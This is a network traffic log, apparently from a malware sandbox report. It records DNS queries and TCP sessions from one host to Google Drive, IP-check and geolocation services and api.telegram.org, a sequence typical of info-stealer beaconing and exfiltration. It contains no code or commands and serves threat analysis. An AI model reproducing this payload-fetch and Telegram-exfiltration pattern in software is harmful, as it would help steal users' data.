                                                                                                                                                              Nov 25, 2024 18:43:46.018522978 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.018573999 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.020128012 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.020176888 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.020256996 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.020303965 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.021887064 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.021940947 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.022145987 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.022193909 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.023590088 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.023653984 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.025331020 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.025384903 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.025434971 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.025482893 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.025516033 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.025568962 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.027209997 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.027259111 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.029022932 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.029078960 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.029098988 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.029144049 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.030714035 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.030770063 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.030841112 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.030891895 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.032437086 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.032490015 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.032568932 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.032618999 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.034236908 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.034291029 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.035917997 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.035969019 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.036037922 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.036086082 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.037662983 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.037715912 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.037741899 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:46.037748098 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:46.037791014 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:47.300899982 CET4978080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:47.426578999 CET8049780132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:47.426676989 CET4978080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:47.426933050 CET4978080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:47.554609060 CET8049780132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:49.643846035 CET8049780132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:49.684931040 CET4978080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:49.734540939 CET4978080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:49.862057924 CET8049780132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:50.262223005 CET8049780132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:50.306241035 CET4978080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:50.755023956 CET49789443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:50.755075932 CET44349789172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:50.755179882 CET49789443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:50.757044077 CET49789443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:50.757061005 CET44349789172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:52.141367912 CET44349789172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:52.141452074 CET49789443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:52.146697044 CET49789443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:52.146713972 CET44349789172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:52.147162914 CET44349789172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:52.152823925 CET49789443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:52.195336103 CET44349789172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:52.754244089 CET44349789172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:52.754410982 CET44349789172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:52.754548073 CET49789443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:52.759282112 CET49789443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:52.765492916 CET4978080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:52.956336021 CET8049780132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:53.326154947 CET8049780132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:53.328265905 CET49795443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:53.328309059 CET44349795172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:53.328389883 CET49795443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:53.328680038 CET49795443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:53.328692913 CET44349795172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:53.368841887 CET4978080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:54.639983892 CET44349795172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:54.641685963 CET49795443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:54.641702890 CET44349795172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:55.108731985 CET44349795172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:55.108880997 CET44349795172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:55.108928919 CET49795443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:55.116291046 CET49795443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:55.127557993 CET4978080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:55.129204035 CET4980280192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:55.269128084 CET8049802132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:55.269313097 CET4980280192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:55.269469976 CET4980280192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:55.269479036 CET8049780132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:55.269541025 CET4978080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:55.405689955 CET8049802132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:57.540918112 CET8049802132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:57.544280052 CET49808443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:57.544306993 CET44349808172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:57.544399977 CET49808443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:57.544652939 CET49808443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:57.544661999 CET44349808172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:57.587487936 CET4980280192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:58.786951065 CET44349808172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:58.788722038 CET49808443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:58.788738012 CET44349808172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:59.244191885 CET44349808172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:59.244364023 CET44349808172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:59.244792938 CET49808443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:59.245179892 CET49808443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:43:59.248795033 CET4980280192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:59.249819040 CET4981280192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:59.380817890 CET8049812132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:59.381136894 CET8049802132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:59.381290913 CET4980280192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:59.381308079 CET4981280192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:59.381455898 CET4981280192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:43:59.505521059 CET8049812132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:01.122101068 CET8049812132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:01.127351999 CET49815443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:01.127372980 CET44349815172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:01.127480984 CET49815443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:01.127733946 CET49815443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:01.127741098 CET44349815172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:01.165637016 CET4981280192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:02.389621973 CET44349815172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:02.391745090 CET49815443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:02.391768932 CET44349815172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:02.858642101 CET44349815172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:02.858793974 CET44349815172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:02.858861923 CET49815443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:02.859273911 CET49815443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:02.863270998 CET4982180192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:02.983724117 CET8049821132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:02.983843088 CET4982180192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:02.985614061 CET4982180192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:03.106173038 CET8049821132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:04.714910984 CET8049821132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:04.716144085 CET49827443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:04.716213942 CET44349827172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:04.716308117 CET49827443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:04.716548920 CET49827443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:04.716569901 CET44349827172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:04.759473085 CET4982180192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:05.988058090 CET44349827172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:05.990005970 CET49827443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:05.990037918 CET44349827172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:06.452080965 CET44349827172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:06.452156067 CET44349827172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:06.452217102 CET49827443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:06.452714920 CET49827443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:06.457345963 CET4982180192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:06.458136082 CET4983180192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:06.588298082 CET8049821132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:06.588354111 CET4982180192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:06.588439941 CET8049831132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:06.588505030 CET4983180192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:06.588623047 CET4983180192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:06.716006041 CET8049831132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:08.091618061 CET8049831132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:08.098970890 CET49834443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:08.099009037 CET44349834172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:08.099092007 CET49834443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:08.099544048 CET49834443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:08.099556923 CET44349834172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:08.134352922 CET4983180192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:09.364381075 CET44349834172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:09.366200924 CET49834443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:09.366219044 CET44349834172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:09.842411041 CET44349834172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:09.842482090 CET44349834172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:09.842559099 CET49834443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:09.842936993 CET49834443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:09.846235991 CET4983180192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:09.847404957 CET4984080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:09.970114946 CET8049831132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:09.970202923 CET4983180192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:09.970504045 CET8049840132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:09.970581055 CET4984080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:09.970698118 CET4984080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:10.093566895 CET8049840132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:11.539491892 CET8049840132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:11.542229891 CET49846443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:11.542308092 CET44349846172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:11.542399883 CET49846443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:11.542656898 CET49846443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:11.542670012 CET44349846172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:11.587861061 CET4984080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:12.863774061 CET44349846172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:12.866255045 CET49846443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:12.866276026 CET44349846172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:13.346632957 CET44349846172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:13.346736908 CET44349846172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:13.346904039 CET49846443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:13.347455978 CET49846443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:13.350987911 CET4984080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:13.351953030 CET4985080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:13.472373009 CET8049840132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:13.472461939 CET4984080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:13.473241091 CET8049850132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:13.473320961 CET4985080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:13.473464966 CET4985080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:13.599021912 CET8049850132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:14.954555988 CET8049850132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:14.955899000 CET49853443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:14.955945015 CET44349853172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:14.956022024 CET49853443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:14.956306934 CET49853443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:14.956321955 CET44349853172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:15.009399891 CET4985080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:16.230895996 CET44349853172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:16.232938051 CET49853443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:16.232969046 CET44349853172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:16.722944021 CET44349853172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:16.723012924 CET44349853172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:16.723094940 CET49853443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:16.723588943 CET49853443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:16.726386070 CET4985080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:16.727571964 CET4985980192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:16.847213984 CET8049850132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:16.847351074 CET4985080192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:16.847944975 CET8049859132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:16.848026991 CET4985980192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:16.848175049 CET4985980192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:16.968487024 CET8049859132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:18.393733978 CET8049859132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:18.395272017 CET49865443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:18.395323038 CET44349865172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:18.395416021 CET49865443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:18.395679951 CET49865443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:18.395689964 CET44349865172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:18.446938992 CET4985980192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:19.671552896 CET44349865172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:19.673352003 CET49865443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:19.673372984 CET44349865172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:20.158153057 CET44349865172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:20.159529924 CET44349865172.67.177.134192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:20.159677029 CET49865443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:20.160089970 CET49865443192.168.2.5172.67.177.134
                                                                                                                                                              Nov 25, 2024 18:44:20.190773010 CET4985980192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:20.315934896 CET8049859132.226.8.169192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:20.316003084 CET4985980192.168.2.5132.226.8.169
                                                                                                                                                              Nov 25, 2024 18:44:20.335983992 CET49870443192.168.2.5149.154.167.220
                                                                                                                                                              Nov 25, 2024 18:44:20.336030006 CET44349870149.154.167.220192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:20.336102009 CET49870443192.168.2.5149.154.167.220
                                                                                                                                                              Nov 25, 2024 18:44:20.336754084 CET49870443192.168.2.5149.154.167.220
                                                                                                                                                              Nov 25, 2024 18:44:20.336767912 CET44349870149.154.167.220192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:21.718426943 CET44349870149.154.167.220192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:21.718525887 CET49870443192.168.2.5149.154.167.220
                                                                                                                                                              Nov 25, 2024 18:44:21.720221043 CET49870443192.168.2.5149.154.167.220
                                                                                                                                                              Nov 25, 2024 18:44:21.720249891 CET44349870149.154.167.220192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:21.720493078 CET44349870149.154.167.220192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:21.721802950 CET49870443192.168.2.5149.154.167.220
                                                                                                                                                              Nov 25, 2024 18:44:21.763331890 CET44349870149.154.167.220192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:22.268260002 CET44349870149.154.167.220192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:22.268353939 CET44349870149.154.167.220192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:22.268426895 CET49870443192.168.2.5149.154.167.220
                                                                                                                                                              Nov 25, 2024 18:44:22.279326916 CET49870443192.168.2.5149.154.167.220
                                                                                                                                                              Nov 25, 2024 18:44:27.881505966 CET4981280192.168.2.5132.226.8.169
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Nov 25, 2024 18:43:36.993199110 CET5231453192.168.2.51.1.1.1
                                                                                                                                                              Nov 25, 2024 18:43:37.147386074 CET53523141.1.1.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:40.036113977 CET5580353192.168.2.51.1.1.1
                                                                                                                                                              Nov 25, 2024 18:43:40.271974087 CET53558031.1.1.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:47.157830000 CET6363553192.168.2.51.1.1.1
                                                                                                                                                              Nov 25, 2024 18:43:47.296161890 CET53636351.1.1.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:50.506174088 CET6273453192.168.2.51.1.1.1
                                                                                                                                                              Nov 25, 2024 18:43:50.753757000 CET53627341.1.1.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:44:20.191453934 CET4984353192.168.2.51.1.1.1
                                                                                                                                                              Nov 25, 2024 18:44:20.334913015 CET53498431.1.1.1192.168.2.5
                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                              Nov 25, 2024 18:43:36.993199110 CET192.168.2.51.1.1.10x4407Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 25, 2024 18:43:40.036113977 CET192.168.2.51.1.1.10xc847Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 25, 2024 18:43:47.157830000 CET192.168.2.51.1.1.10xfca8Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 25, 2024 18:43:50.506174088 CET192.168.2.51.1.1.10x48bcStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 25, 2024 18:44:20.191453934 CET192.168.2.51.1.1.10xeaabStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                              Nov 25, 2024 18:43:37.147386074 CET1.1.1.1192.168.2.50x4407No error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 25, 2024 18:43:40.271974087 CET1.1.1.1192.168.2.50xc847No error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 25, 2024 18:43:47.296161890 CET1.1.1.1192.168.2.50xfca8No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Nov 25, 2024 18:43:47.296161890 CET1.1.1.1192.168.2.50xfca8No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 25, 2024 18:43:47.296161890 CET1.1.1.1192.168.2.50xfca8No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 25, 2024 18:43:47.296161890 CET1.1.1.1192.168.2.50xfca8No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 25, 2024 18:43:47.296161890 CET1.1.1.1192.168.2.50xfca8No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 25, 2024 18:43:47.296161890 CET1.1.1.1192.168.2.50xfca8No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 25, 2024 18:43:50.753757000 CET1.1.1.1192.168.2.50x48bcNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 25, 2024 18:43:50.753757000 CET1.1.1.1192.168.2.50x48bcNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 25, 2024 18:44:20.334913015 CET1.1.1.1192.168.2.50xeaabNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                              • drive.google.com
                                                                                                                                                              • drive.usercontent.google.com
                                                                                                                                                              • reallyfreegeoip.org
                                                                                                                                                              • api.telegram.org
                                                                                                                                                              • checkip.dyndns.org
                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
